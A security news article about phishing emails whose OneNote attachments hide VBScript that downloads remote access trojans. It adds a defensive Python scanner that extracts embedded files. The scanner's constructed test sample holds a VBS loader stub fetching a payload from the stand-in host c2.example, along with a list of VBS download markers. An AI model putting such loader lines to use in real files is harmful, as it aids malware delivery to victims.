Hackers have found a new technique to bypass the macro block in Microsoft Office files and still deliver malware to unsuspecting victims through the company's suite of online collaboration apps.
Security researchers at BleepingComputer found freshly distributed phishing emails carrying OneNote attachments.
OneNote is a digital note-taking app that people can use to create a shareable content library. It ships as part of the broader Microsoft Office suite, meaning that anyone with Office installed can open OneNote files, too. While OneNote's files, called notebooks, don't support macros, they do support embedded file attachments, and that is what the crooks are now leveraging.
Malicious VBS information
The phishing emails themselves are nothing out of the ordinary – they include fake DHL parcel notifications, fake invoices, fake shipping notifications, ACH remittance forms, and the like. Instead of carrying a Word or Excel file, they carry a OneNote file which, when opened, appears to be blurred out, with a large button in the middle reading "Double Click to View File".
Double-clicking, however, runs the attachment hidden beneath that button, which in this case is a malicious VBS (VBScript) file.
This script then contacts the command and control (C2) server and downloads the actual malware.
BleepingComputer obtained several of these emails and determined that multiple remote access trojans and infostealers are being distributed this way, including the AsyncRAT and XWorm remote access trojans, as well as the Quasar remote access trojan.
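Because the OneNote file itself carries no macro, the place to look is the embedded attachment. OneNote stores each embedded file in a FileDataStoreObject (documented in MS-ONESTORE): a 16-byte header GUID, an 8-byte little-endian length, 4 unused and 8 reserved bytes, the raw file bytes, then a 16-byte footer GUID. The scanner below, an added example that is not part of the original article or of any BleepingComputer tooling, walks a .one file for those headers, pulls out every attachment, and flags payloads that look like VBScript or an executable rather than the decoy image. The sample notebook bytes, the hostname c2.example, and the content-sniffing rules are constructed assumptions for the demonstration, not material from a real campaign.

```python
"""Scan a OneNote (.one) file for embedded attachments and flag script payloads."""
import struct
import uuid
from dataclasses import dataclass

# GUIDs from MS-ONESTORE (FileDataStoreObject); stored on disk in Windows
# GUID layout, i.e. Data1..Data3 little-endian, hence bytes_le.
FILE_DATA_HEADER = uuid.UUID("{BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}").bytes_le
FILE_DATA_FOOTER = uuid.UUID("{71FBA722-0F79-4A0B-BB13-899256426B24}").bytes_le
ONE_FILE_TYPE = uuid.UUID("{7B5C52E4-D88C-4DA7-AEB1-5378D02996D3}").bytes_le
HEADER_SIZE = 16 + 8 + 4 + 8  # guidHeader + cbLength + unused + reserved

# Assumption: marker strings chosen for the kind of VBS loader described above.
VBS_MARKERS = (b"createobject(", b"wscript.shell", b"msxml2.xmlhttp", b"adodb.stream")


@dataclass
class Finding:
    offset: int       # byte offset of the FileDataStoreObject header
    length: int       # bytes actually recovered
    kind: str         # result of classify()
    footer_ok: bool   # footer GUID present where cbLength says it should be
    payload: bytes


def classify(payload: bytes) -> str:
    """Cheap content sniff. The attachment's file name lives in a separate
    property set, so a renamed .vbs cannot be caught by extension alone."""
    head = payload[:4096]
    lower = head.lower()
    if head.startswith(b"MZ"):
        return "pe-executable"
    if head.startswith(b"%PDF"):
        return "pdf"
    if head.startswith(b"\x89PNG") or head.startswith(b"\xff\xd8\xff"):
        return "image"
    if any(marker in lower for marker in VBS_MARKERS):
        return "vbscript"
    if b"<script" in lower or b"activexobject" in lower:
        return "script-html"
    return "unknown"


def scan(data: bytes) -> list:
    """Return a Finding for every FileDataStoreObject in `data`."""
    findings = []
    pos = data.find(FILE_DATA_HEADER)
    while pos != -1:
        hdr_end = pos + HEADER_SIZE
        if hdr_end > len(data):
            break
        (length,) = struct.unpack_from("<Q", data, pos + 16)
        available = len(data) - hdr_end
        if length > available:
            # cbLength runs past EOF: corrupt or deliberately truncated. Keep
            # what is there and do not trust the length when seeking onward.
            payload, footer_ok, next_pos = data[hdr_end:], False, hdr_end
        else:
            payload = data[hdr_end:hdr_end + length]
            footer_ok = data[hdr_end + length:hdr_end + length + 16] == FILE_DATA_FOOTER
            next_pos = hdr_end + length
        findings.append(Finding(pos, len(payload), classify(payload), footer_ok, payload))
        pos = data.find(FILE_DATA_HEADER, next_pos)
    return findings


def build_fake_notebook() -> bytes:
    """Constructed sample, not a real capture: a PNG stub standing in for the
    'Double Click to View File' overlay, followed by a VBS loader stub."""
    def file_object(body: bytes) -> bytes:
        return (FILE_DATA_HEADER + struct.pack("<Q", len(body))
                + b"\0" * 4 + b"\0" * 8 + body + FILE_DATA_FOOTER)

    overlay = b"\x89PNG\r\n\x1a\n" + b"\0" * 64
    loader = (b'Set s = CreateObject("WScript.Shell")\r\n'
              b'Set x = CreateObject("MSXML2.XMLHTTP")\r\n'
              b'x.Open "GET", "http://c2.example/payload.bin", False\r\n')
    return (ONE_FILE_TYPE + b"\0" * 32 + file_object(overlay)
            + b"\0" * 16 + file_object(loader) + b"\0" * 8)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_fake_notebook()
    for f in scan(data):
        flag = "SUSPICIOUS" if f.kind in ("vbscript", "pe-executable", "script-html") else "ok"
        print(f"offset={f.offset:#x} len={f.length} kind={f.kind} footer={f.footer_ok} {flag}")
```

Run it against a real file with `python scan_one.py suspicious.one`; without an argument it scans the constructed sample and reports the image overlay as benign and the VBS stub as suspicious. The truncated-length branch matters in practice: a crafted cbLength that points past end of file would otherwise make a naive scanner skip every later attachment.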
The best way to protect against these attacks is the same as it always was – train your employees not to open attachments or click email links from senders they don't know, don't trust, or whose identity can't be confirmed. They should also be taught not to dismiss the warning prompts shown by programs such as Word, Excel, or OneNote when an embedded file is about to run. Beyond that, a strong antivirus solution and a firewall are welcome.
Finally, enabling multi-factor authentication (MFA) wherever possible greatly reduces the chance that a stolen credential turns into a more serious compromise.
Via: BleepingComputer